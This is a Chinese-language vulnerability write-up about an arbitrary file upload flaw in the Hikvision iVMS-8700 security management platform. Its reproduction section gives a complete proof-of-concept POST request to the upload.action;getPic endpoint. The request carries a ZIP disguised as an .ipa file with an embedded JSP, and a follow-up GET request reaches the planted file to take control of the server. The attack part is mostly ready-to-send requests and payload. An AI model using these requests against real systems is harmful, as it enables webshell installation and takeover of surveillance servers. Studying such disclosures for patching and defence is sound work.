海康威视iVMS-8700综合安防管理平台 getPic任意文件上传

一、漏洞简介

海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器。

二、影响版本

三、资产测绘

1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png

1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png

1702013270650-1660293d-021f-41a6-971a-543f1d8f45f9.png

四、漏洞复现

1.生成一个压缩文件,目录结构如下。

output.zip

1702013473674-dacbf15c-db9f-405d-aad7-89d64bc619da.png

1702013924779-909124a7-12aa-4d40-93e8-a492fd759f30.png

  1. poc
POST /msp/home/upload.action;getPic?&type=ios HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: MicroMessenger
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 1288
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="type"

ios
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.ipa"

PKz¦nWtest1/test/PKxäVM(?test1/test/.DS_Storeí˜ÁJÃ@Œº˜¥Ë|Ð?ˆe—BÀµÖJ]¤M(ê:ÿãO4™¹¥-
¡Ýµôž,΄÷&y$$ó=®¦ˆ6í`Æ{C–¾î&‡k| Ä<îñ†ó «ýÏmå_XîÔ_£.g£â½š×ëä¡Üyåý¤¬&|X/ÿ¿ÃùÓ£òëÏÃkù)–‹²ZÌÂ{B!v1\ßo „ûÿ‡ŒÎé&Ú0nédkŽ£3:§›àöˆ¶tB§´£3:§›hÃûX:¡SÚÑCÑÃU”ëÖÿÇð     !.
“øÂ6‹,×pš÷³îº±!N“PK’¦nWtest1/test/PetrelHD.app/PKÓ¤nW¦ëdjtest1/test/ceshi.jspÈM
Â@Ы¸)LR« —®EOôC#afœ¦íõû³|ïR¥Á9n1´ÍùtÜ·us¨©‹˜v?…5ñM
Ar6}‰kŠü? vÿ†‚ÿ€Þ×{¢ŒߚˆøEÔU×PKt¦nWtest1/PK?z¦nW$test1/test/
 ó¯ÚPK?xäVM(?$€)test1/test/.DS_Store
 ¹,E®ÙPK?’¦nW$0Ttest1/test/PetrelHD.app/
 Н!ÚPK?Ó¤nW¦ëdj$ test1/test/ceshi.jsp
 ö¨Ë|÷ÚPK?t¦nW$ test1/
 *|{ÚPKëD
--00content0boundary00--

1702013640375-50b7b597-ac3d-47fc-9d0b-5a0f46eb0ebe.png

上传文件位置

GET /msp/upload/ios/{filename}/test1/test/ceshi.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: MicroMessenger
Connection: close
Cookie: JSESSIONID=9534BB058003BD8772529364EF5E034E
Accept-Encoding: gzip, deflate

1702013781703-4705dcab-3ba9-4e0a-a398-299f29f7f5e1.png

1702013887570-7fa4d933-987d-4d21-9949-797bf5b53a2d.png

更新: 2024-02-29 23:57:17
原文: https://www.yuque.com/xiaokp7/ocvun2/ore95852gqp60g63